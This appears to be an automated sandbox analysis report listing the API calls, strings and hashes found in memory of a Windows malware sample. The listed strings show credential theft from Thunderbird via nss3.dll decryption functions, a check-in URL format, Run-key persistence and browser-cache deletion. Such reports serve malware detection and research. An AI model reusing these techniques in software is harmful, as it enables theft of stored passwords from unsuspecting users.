Part of subcall function 001C9D5C: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 001C9E19

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D1F78
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D2008
WaitForMultipleObjects.KERNEL32(00008019,?,00000000,000000FF), ref: 001D20AE

Part of subcall function 001DE522: RtlAllocateHeap.NTDLL(00000000,00000010,77A4F730), ref: 001DE544
Part of subcall function 001DE522: HeapFree.KERNEL32(00000000,00000000,00000129,00000000,00000000,?,?,?,?,001D1F4E), ref: 001DE575

WaitForSingleObject.KERNEL32(?,00000000), ref: 001D20E3
WaitForSingleObject.KERNEL32(?,00000000), ref: 001D20F2
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 001D211F
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 001D2139
_allmul.NTDLL(0000012C,00000000,FF676980,000000FF), ref: 001D2181
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000012C,00000000,FF676980,000000FF,00000000), ref: 001D219B
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001D21B1
ReleaseMutex.KERNEL32(?), ref: 001D21CE
WaitForSingleObject.KERNEL32(?,00000000), ref: 001D21DF
WaitForSingleObject.KERNEL32(?,00000000), ref: 001D21EE
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 001D2222
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 001D223C
SwitchToThread.KERNEL32 ref: 001D223E
ReleaseMutex.KERNEL32(?), ref: 001D2248

Part of subcall function 001DDBDA: RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 001DDBF8
Part of subcall function 001DDBDA: RegQueryValueExA.ADVAPI32(?,Main,00000000,?,00000000,?,77A4F710,00000000), ref: 001DDC1D
Part of subcall function 001DDBDA: RtlAllocateHeap.NTDLL(00000000,?), ref: 001DDC2E
Part of subcall function 001DDBDA: RegQueryValueExA.ADVAPI32(?,Main,00000000,?,00000000,?), ref: 001DDC49
Part of subcall function 001DDBDA: HeapFree.KERNEL32(00000000,?), ref: 001DDC69
Part of subcall function 001DDBDA: RegCloseKey.ADVAPI32(?), ref: 001DDC72

WaitForSingleObject.KERNEL32(?,00000000), ref: 001D2286
WaitForSingleObject.KERNEL32(?,00000000), ref: 001D2291
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 001D22B4
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 001D22CE
SwitchToThread.KERNEL32 ref: 001D22D0
ReleaseMutex.KERNEL32(?), ref: 001D22DA
WaitForSingleObject.KERNEL32(?,00000000), ref: 001D22EF
CloseHandle.KERNEL32(?), ref: 001D233D
CloseHandle.KERNEL32(?), ref: 001D2351
CloseHandle.KERNEL32(?), ref: 001D235D
CloseHandle.KERNEL32(?), ref: 001D2369
CloseHandle.KERNEL32(?), ref: 001D2375
CloseHandle.KERNEL32(?), ref: 001D2381
CloseHandle.KERNEL32(?), ref: 001D238D
CloseHandle.KERNEL32(?), ref: 001D2399
RtlExitUserThread.NTDLL(00000000), ref: 001D23A8

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Wait$Close$Handle$ObjectSingleTimerWaitable$HeapMultipleObjects$MutexRelease_allmul$FreeThread$AllocateCreateErrorLastOpenQuerySwitchTimeValue$EventExitFileSystemUser
String ID:
API String ID: 3804754466-0
Opcode ID: 9f5c2dcc62560185512982854bae8ede23adcd551ec17f91fcba3f1d24d6748f
Instruction ID: 2f55dde152b0e5027c39089a2ac2c5dbd2b065eb71569983b7de77dbeb097500
Opcode Fuzzy Hash: 9f5c2dcc62560185512982854bae8ede23adcd551ec17f91fcba3f1d24d6748f
Instruction Fuzzy Hash: 69E19EB1404345AFDB11AFA4DCC096EB7EDFBA8354F044A2EF5A5962A0D774DC80CB62

Uniqueness

Uniqueness Score: 100.00%

Function 001D9221, Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 377memorystringUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32(,?,001E60C4), ref: 001D9279
RtlAllocateHeap.NTDLL(00000000,001E5A91,?), ref: 001D9313
lstrcpyn.KERNEL32(00000000,?,001E5A91,?,001E60C4), ref: 001D9328
HeapFree.KERNEL32(00000000,00000000,00000000,?,001E60C4), ref: 001D9344
StrChrA.SHLWAPI(?,?,?,00000000,00000000,?,001E5A90,?,?,001E60C4), ref: 001D941C
StrChrA.SHLWAPI(00000001,?,?,001E60C4), ref: 001D942D
lstrlen.KERNEL32(00000000,?,001E60C4), ref: 001D9441
memmove.NTDLL(001E5A91,?,00000001,?,001E60C4), ref: 001D9451
lstrlen.KERNEL32(?,?,00000000,00000000,?,001E5A90,?,?,001E60C4), ref: 001D9474
RtlAllocateHeap.NTDLL(00000000,?), ref: 001D949A
memcpy.NTDLL(00000000,?,?,?,001E60C4), ref: 001D94AE
memcpy.NTDLL(001E5A90,?,?,?,001E60C4), ref: 001D94CE
HeapFree.KERNEL32(00000000,001E5A90,?,?,?,?,?,?,?,?,001E60C4), ref: 001D950A
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001D95D0
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 001D9618

Strings

identity, xrefs: 001D945C
OPTI, xrefs: 001D9411
Content-Type:, xrefs: 001D9376
GET , xrefs: 001D9409
User-Agent:, xrefs: 001D92F2
ocsp, xrefs: 001D9383
, xrefs: 001D9274, 001D92A5
POST, xrefs: 001D9254
PUT , xrefs: 001D924D
OPTI, xrefs: 001D925B
Accept-Encoding:, xrefs: 001D9461
GET , xrefs: 001D9246

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
String ID: $ identity$Accept-Encoding:$Content-Type:$GET $GET $OPTI$OPTI$POST$PUT $User-Agent:$ocsp
API String ID: 3227826163-2797658706
Opcode ID: e2e0e60d748f8b0d484bf22afda5cb43730ed1364c77374aeda6e57a41e6d2cc
Instruction ID: 829dd34d3bac9e7778a8375762905b775bbda79d6846847553a975bdc72c486a
Opcode Fuzzy Hash: e2e0e60d748f8b0d484bf22afda5cb43730ed1364c77374aeda6e57a41e6d2cc
Instruction Fuzzy Hash: 74D13871A00205AFDF15DFA8C985BADBBB9BF04310F14816AF915AB3A1D730EE51DB50

Uniqueness

Uniqueness Score: 100.00%

Function 001D8FF6, Relevance: 36.8, APIs: 14, Strings: 7, Instructions: 93libraryloaderstringUNIQUE

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,?,001D9F95,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 001D9003

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,001D9F95,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 001D902C
lstrcpyW.KERNEL32(-0000FFFE,?), ref: 001D904C
lstrcpyW.KERNEL32(-00000002,nss3.dll), ref: 001D905F
SetCurrentDirectoryW.KERNEL32(?,?,?,?,001D9F95,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 001D906B
LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,001D9F95,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 001D906E
SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,001D9F95,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 001D907A
GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 001D908C
GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 001D909B
GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 001D90AA
GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 001D90B9
GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 001D90C8
GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 001D90D7
FreeLibrary.KERNEL32(00000000,?,?,?,001D9F95,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 001D9100

Strings

PK11_Authenticate, xrefs: 001D90C2
PK11_FreeSlot, xrefs: 001D90B3
PK11SDR_Decrypt, xrefs: 001D90D1
NSS_Shutdown, xrefs: 001D9095
NSS_Init, xrefs: 001D9086
nss3.dll, xrefs: 001D9056
PK11_GetInternalKeySlot, xrefs: 001D90A4

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
API String ID: 3772355505-3659000792
Opcode ID: ac7bd9578fb7d0dd18db39d7b090e994d000e3e08bb65df8e35d0a6b077795a9
Instruction ID: d8c52dd7b8e06a2813e89e6680de696da7923b6ee37cdb373dcb064a343daf8e
Opcode Fuzzy Hash: ac7bd9578fb7d0dd18db39d7b090e994d000e3e08bb65df8e35d0a6b077795a9
Instruction Fuzzy Hash: DF216FB2A01757AFD7209F71DC85E5BBBECEF08780B00842AF905A2256DF74D9508BA0

Uniqueness

Uniqueness Score: 100.00%

Function 001D0991, Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 232memorystringUNIQUE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,00000000), ref: 001D09BE
wsprintfA.USER32 ref: 001D0A20
wsprintfA.USER32 ref: 001D0A67
wsprintfA.USER32 ref: 001D0A8A
lstrcat.KERNEL32(?,726F7426), ref: 001D0ABF
RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 001D0AD8
RtlEnterCriticalSection.NTDLL(03E58D20), ref: 001D0AF1
RtlLeaveCriticalSection.NTDLL(03E58D20), ref: 001D0B0F
StrTrimA.SHLWAPI(00000000,001E2408,?,03E58D60), ref: 001D0B45

Part of subcall function 001D08D3: lstrlen.KERNEL32(001D0B58,77A381D0,00000000,001D0B58,/images/,?), ref: 001D08DF
Part of subcall function 001D08D3: lstrlen.KERNEL32(?), ref: 001D08E7
Part of subcall function 001D08D3: lstrcpy.KERNEL32(00000000,?), ref: 001D08FE
Part of subcall function 001D08D3: lstrcat.KERNEL32(00000000,?), ref: 001D0909

lstrcpy.KERNEL32(?,706D622E), ref: 001D0B78
lstrcpy.KERNEL32(00000000,?), ref: 001D0B7E
lstrcat.KERNEL32(00000000,?), ref: 001D0B84
lstrcat.KERNEL32(00000000,?), ref: 001D0B8A
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000000,?), ref: 001D0C2D
HeapFree.KERNEL32(00000000,?,/images/,?), ref: 001D0C3F
HeapFree.KERNEL32(00000000,00000000,?,03E58D60), ref: 001D0C4D
HeapFree.KERNEL32(00000000,?), ref: 001D0C5D
HeapFree.KERNEL32(00000000,?,?), ref: 001D0C6D

Strings

/images/, xrefs: 001D0B4E
version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s, xrefs: 001D0A1A

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Free$lstrcat$lstrcpywsprintf$AllocateCriticalSectionlstrlen$EnterLeaveTrim
String ID: /images/$version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
API String ID: 3741932909-1114245408
Opcode ID: c04b8aa285d2d1c1dcafc2ec05ee09dc3c49254368738fda6d7821609cca9a70
Instruction ID: bfe4fe53d71c6ee94fe7885f3a363edbf72adaa6c5956c73d414aed157cab0ba
Opcode Fuzzy Hash: c04b8aa285d2d1c1dcafc2ec05ee09dc3c49254368738fda6d7821609cca9a70
Instruction Fuzzy Hash: 1591C071A00289EFCB02DFE4DC84EAE7BB9FB18304F144056F509AB661D7719D90CBA0

Uniqueness

Uniqueness Score: 100.00%

Function 001DE977, Relevance: 33.2, APIs: 22, Instructions: 208memorystringUNIQUE

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 001DE98B
wsprintfA.USER32 ref: 001DE9DC
QueryPerformanceFrequency.KERNEL32(?), ref: 001DE9E7
QueryPerformanceCounter.KERNEL32(?), ref: 001DE9F1
_aulldiv.NTDLL(?,?,?,?), ref: 001DEA03
wsprintfA.USER32 ref: 001DEA19
wsprintfA.USER32 ref: 001DEA52
lstrcat.KERNEL32(?,726F7426), ref: 001DEA87
RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 001DEAA0
GetTickCount.KERNEL32 ref: 001DEAB1
RtlEnterCriticalSection.NTDLL(03E58D20), ref: 001DEAC5
RtlLeaveCriticalSection.NTDLL(03E58D20), ref: 001DEAE3

Part of subcall function 001D61E9: lstrlen.KERNEL32(00000000,253D7325,77A381D0,00000000,00000000,?,?,001D0B24,?,03E58D60), ref: 001D6214
Part of subcall function 001D61E9: lstrlen.KERNEL32(?,?,?,001D0B24,?,03E58D60), ref: 001D621C
Part of subcall function 001D61E9: strcpy.NTDLL ref: 001D6233
Part of subcall function 001D61E9: lstrcat.KERNEL32(00000000,?), ref: 001D623E
Part of subcall function 001D61E9: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,001D0B24,?,?,001D0B24,?,03E58D60), ref: 001D625B

StrTrimA.SHLWAPI(00000000,001E2408,?,03E58D60), ref: 001DEB17

Part of subcall function 001D08D3: lstrlen.KERNEL32(001D0B58,77A381D0,00000000,001D0B58,/images/,?), ref: 001D08DF
Part of subcall function 001D08D3: lstrlen.KERNEL32(?), ref: 001D08E7
Part of subcall function 001D08D3: lstrcpy.KERNEL32(00000000,?), ref: 001D08FE
Part of subcall function 001D08D3: lstrcat.KERNEL32(00000000,?), ref: 001D0909

lstrcpy.KERNEL32(00000000,?), ref: 001DEB44
lstrcpy.KERNEL32(00000000,00000000), ref: 001DEB4C
lstrcat.KERNEL32(00000000,?), ref: 001DEB55
lstrcat.KERNEL32(00000000,00000000), ref: 001DEB59
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000001), ref: 001DEBD0
HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 001DEBDF
HeapFree.KERNEL32(00000000,00000000,?,03E58D60), ref: 001DEBF0
HeapFree.KERNEL32(00000000,00000000), ref: 001DEC01
HeapFree.KERNEL32(00000000,?,?), ref: 001DEC12

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Freelstrcat$lstrlen$lstrcpywsprintf$CountCriticalPerformanceQuerySectionTickTrim$AllocateCounterEnterFrequencyLeave_aulldivstrcpy
String ID:
API String ID: 2417228945-0
Opcode ID: 808db7772833eb7aa93490ea3917dcf8d1788ae32d1cbd34845510f763d81fff
Instruction ID: 9e73dc79c0ff96d6c2ae99f8c488a91632fb2afc8b11c52341a231b586c69539
Opcode Fuzzy Hash: 808db7772833eb7aa93490ea3917dcf8d1788ae32d1cbd34845510f763d81fff
Instruction Fuzzy Hash: E8715931600189EFDB029FE4EC85EAE3BB9FB18315F144016FA05EB6A1D775E991CB60

Uniqueness

Uniqueness Score: 100.00%

Function 001DFDB0, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 233memorystringUNIQUE

Download Yara Rule

APIs

Part of subcall function 001C7B8F: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BC7
Part of subcall function 001C7B8F: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C7BDB
Part of subcall function 001C7B8F: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BF5
Part of subcall function 001C7B8F: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,001C67ED,Kill,?,?), ref: 001C7C1F

HeapFree.KERNEL32(00000000,001D2253,LastTask,001D2253,?,77A4F710,00000000,00000000), ref: 001DFDF0
RtlAllocateHeap.NTDLL(00000000,00010000,LastTask), ref: 001DFE14
HeapFree.KERNEL32(00000000,?,0000011A,00000000,00000000,?,?,?,?,?,?,?,001D2253), ref: 001DFE42
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DFE74
HeapFree.KERNEL32(00000000,001E2408,0000011B,00000000,00000000,00000000,?,?,?,?,?,?,001D2253), ref: 001DFEE4
RtlAllocateHeap.NTDLL(00000000,?,LastTask), ref: 001DFFA9
wsprintfA.USER32 ref: 001DFFBD
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,001D2253), ref: 001DFFC8
HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000,?,?,?,?,?,?,?,?,?,?,001D2253), ref: 001DFFE2
HeapFree.KERNEL32(00000000,?,LastTask,?,00000008,0000000B,001D2253,?,?,00000001), ref: 001E0004
RtlAllocateHeap.NTDLL(00000000,?,001D2253), ref: 001E001F
wsprintfA.USER32 ref: 001E002F
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,001D2253), ref: 001E003A

Part of subcall function 001DD85D: lstrlen.KERNEL32(001DAF1C,00000000,779F5520,?,?,?,001DAF1C,00000126,00000000,779F551B,00000000), ref: 001DD88D
Part of subcall function 001DD85D: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001DD8A3
Part of subcall function 001DD85D: memcpy.NTDLL(00000010,001DAF1C,00000000,?,?,001DAF1C,00000126,00000000), ref: 001DD8D9
Part of subcall function 001DD85D: memcpy.NTDLL(00000010,00000000,00000126,?,?,001DAF1C,00000126), ref: 001DD8F4
Part of subcall function 001DD85D: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 001DD912
Part of subcall function 001DD85D: GetLastError.KERNEL32(?,?,001DAF1C,00000126), ref: 001DD91C
Part of subcall function 001DD85D: HeapFree.KERNEL32(00000000,00000000,?,?,001DAF1C,00000126), ref: 001DD942

HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000,?,?,?,?,?,?,?,?,?,?,001D2253), ref: 001E0054
HeapFree.KERNEL32(00000000,001D2253,?,00000001,?,?,?,?,?,?,001D2253), ref: 001E0064

Strings

Cmd %u parsing: %u, xrefs: 001E0029
Cmd %s processed: %u, xrefs: 001DFFB7
LastTask, xrefs: 001DFDC3, 001DFF25

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
String ID: Cmd %s processed: %u$Cmd %u parsing: %u$LastTask
API String ID: 3733591251-3332907627
Opcode ID: 2bfc02775e4006954a7a52c14bd28a677ec9b84cc0ef9bcceeec28c69312201d
Instruction ID: 0236c42c87ce9c3a245f64ebd303bf58f98a78da725b9f0cddeea25fde7b007e
Opcode Fuzzy Hash: 2bfc02775e4006954a7a52c14bd28a677ec9b84cc0ef9bcceeec28c69312201d
Instruction Fuzzy Hash: 9C8157B2800259FFDB21AFD5DCC4DAEBBB9FB08344F10446AF512A66A1C7705E81DB61

Uniqueness

Uniqueness Score: 100.00%

Function 001CAB36, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 168memoryfilesynchronizationUNIQUE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 001CAB52
RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAB6E
GetLastError.KERNEL32 ref: 001CABBD
HeapFree.KERNEL32(00000000,00000000), ref: 001CABD3
RtlAllocateHeap.NTDLL(00000000,?), ref: 001CABE7
GetLastError.KERNEL32 ref: 001CAC01
GetLastError.KERNEL32 ref: 001CAC34
HeapFree.KERNEL32(00000000,00000000), ref: 001CAC52
HeapFree.KERNEL32(00000000,00000000), ref: 001CAC87
DeleteFileW.KERNEL32(?,00000000,cache2\entries\*.*,?,00000000,00000000,00000001), ref: 001CACD9
HeapFree.KERNEL32(00000000,?), ref: 001CACE7
WaitForSingleObject.KERNEL32(00000000), ref: 001CACFB
HeapFree.KERNEL32(00000000,?), ref: 001CAD0F
RtlExitUserThread.NTDLL(?,%userprofile%\AppData\Local\Mozilla\Firefox\Profiles,%userprofile%\AppData\Local\Google\Chrome\User Data\Default\cache), ref: 001CAD24

Strings

%userprofile%\AppData\Local\Mozilla\Firefox\Profiles, xrefs: 001CAC8D
%userprofile%\AppData\Local\Google\Chrome\User Data\Default\cache, xrefs: 001CAC58
cache2\entries\*.*, xrefs: 001CACAF

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWait
String ID: %userprofile%\AppData\Local\Google\Chrome\User Data\Default\cache$%userprofile%\AppData\Local\Mozilla\Firefox\Profiles$cache2\entries\*.*
API String ID: 3597156539-1412051077
Opcode ID: baaf7033b04378de5c896b757b1d537a5935b4dd81e775a5699388f94278db9c
Instruction ID: d1623eecabe4c4d88063b7b9598dbeda0b469a03ac72167cf5aafeb65e9feaed
Opcode Fuzzy Hash: baaf7033b04378de5c896b757b1d537a5935b4dd81e775a5699388f94278db9c
Instruction Fuzzy Hash: 0851467180124DAFDB119FE0CDC8EAEBBBAEF14358B504029F501A76A0DB309E85DB61

Uniqueness

Uniqueness Score: 100.00%

Function 001D6D26, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 129memoryregistrythreadUNIQUE

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 001D6D41
RtlEnterCriticalSection.NTDLL(00000000), ref: 001D6D5E
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 001D6DAE
DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 001D6DB8
GetLastError.KERNEL32 ref: 001D6DC2
HeapFree.KERNEL32(00000000,00000000), ref: 001D6DD3
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 001D6DF5
HeapFree.KERNEL32(00000000,?), ref: 001D6E2C
RtlLeaveCriticalSection.NTDLL(00000000), ref: 001D6E40
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001D6E49
SuspendThread.KERNEL32(?), ref: 001D6E58
CreateEventA.KERNEL32(001E6114,00000001,00000000), ref: 001D6E6C
SetEvent.KERNEL32(00000000), ref: 001D6E79
CloseHandle.KERNEL32(00000000), ref: 001D6E80
Sleep.KERNEL32(000001F4), ref: 001D6E93
ResumeThread.KERNEL32(?), ref: 001D6EB7

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 001D6D32

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 1011176505-1428018034
Opcode ID: d1ee4b78fa334f4673be38d532777a6f79219e5b0c38beaec2210bec651ee604
Instruction ID: 0482b540bf9e4e72bbc86ac1438beb854f95ea78b18e119e1dcf66c3f57381ff
Opcode Fuzzy Hash: d1ee4b78fa334f4673be38d532777a6f79219e5b0c38beaec2210bec651ee604
Instruction Fuzzy Hash: 88417072900589FFDB109FE4ECC89ADBBBAFB14344B14402AF601EA660C7319DD5CB90

Uniqueness

Uniqueness Score: 100.00%

Function 001D23AF, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 113memorystringUNIQUE

Download Yara Rule

APIs

lstrlen.KERNEL32 ref: 001D23CC
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001D23D9
lstrcpy.KERNEL32(00000000,?), ref: 001D23EE
StrRChrA.SHLWAPI(00000000,00000000,0000005C), ref: 001D23F8
GetFileAttributesA.KERNEL32(?), ref: 001D2417
HeapFree.KERNEL32(00000000,00000000), ref: 001D24D8
HeapFree.KERNEL32(00000000,00000000), ref: 001D24E7
HeapFree.KERNEL32(00000000,00000000), ref: 001D24F6

Strings

\setup.inf, xrefs: 001D249B
\setup.rpt, xrefs: 001D24B1
makecab.exe /F "%s", xrefs: 001D2476

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heap$Free$AllocateAttributesFilelstrcpylstrlen
String ID: \setup.inf$\setup.rpt$makecab.exe /F "%s"
API String ID: 530445200-4071826726
Opcode ID: 6a6abe618ef5539e39b49be946e603f1cff46634344f0b2ebbae23d70cc62ae7
Instruction ID: 8f59e789852268e6bf7014376a02d52b330e0e2ff42571ab0c627a736f5e69ab
Opcode Fuzzy Hash: 6a6abe618ef5539e39b49be946e603f1cff46634344f0b2ebbae23d70cc62ae7
Instruction Fuzzy Hash: EE31D231105781BFD3116FA59C85F2F7EADEFA5714F00011AF954A62A2CB74C944DBA2

Uniqueness

Uniqueness Score: 100.00%

Function 001C40CD, Relevance: 29.8, APIs: 9, Strings: 8, Instructions: 49librarymemoryUNIQUE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WININET.DLL,?,00000000,001C5172,00000000,77A4F5B0,001C17F8,61636F4C,00000001,?,?,?,00000000), ref: 001C40DC
TlsAlloc.KERNEL32(?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C40E2
LoadLibraryA.KERNEL32(ieframe,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C4100
LoadLibraryA.KERNEL32(ieui,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C4107
LoadLibraryA.KERNEL32(mshtml,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C410E
LoadLibraryA.KERNEL32(inetcpl.cpl,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C4115
LoadLibraryA.KERNEL32(ieapfltr,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C411C
LoadLibraryA.KERNEL32(urlmon,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C4123
___HrLoadAllImportsForDll@4.DELAYIMP ref: 001C412A

Strings

WININET.DLL, xrefs: 001C40D5
ieframe, xrefs: 001C40FB
ieapfltr, xrefs: 001C4117
urlmon, xrefs: 001C411E
ieui, xrefs: 001C4102
inetcpl.cpl, xrefs: 001C4110
WININET.dll, xrefs: 001C4125
mshtml, xrefs: 001C4109

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Load$Library$AllocDll@4Imports
String ID: WININET.DLL$WININET.dll$ieapfltr$ieframe$ieui$inetcpl.cpl$mshtml$urlmon
API String ID: 286772175-1120705325
Opcode ID: 97a9144e0100439092b1e81154d33e6ec7f0e885b306bf451f8d0c96f45f0026
Instruction ID: a680a8a71ebd3e2bdcf377350c87b9c5e104f61724a37a6baf4659a28db86c6d
Opcode Fuzzy Hash: 97a9144e0100439092b1e81154d33e6ec7f0e885b306bf451f8d0c96f45f0026
Instruction Fuzzy Hash: 5301A231B88AE867F62063F76D46F0F2E56CBA0BB0F090116F1589A1D1DBA0D880C661

Uniqueness

Uniqueness Score: 100.00%

Function 001C1364, Relevance: 28.2, APIs: 6, Strings: 10, Instructions: 172stringUNIQUE

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,001E82FB,Port,?,001E82FB,Secure_Connection,?,001E82FB,User_Name,?,001E82FB,Server), ref: 001C143C
lstrcpyW.KERNEL32(00000000,001E85C4), ref: 001C1454
lstrcatW.KERNEL32(00000000,00000000), ref: 001C145C
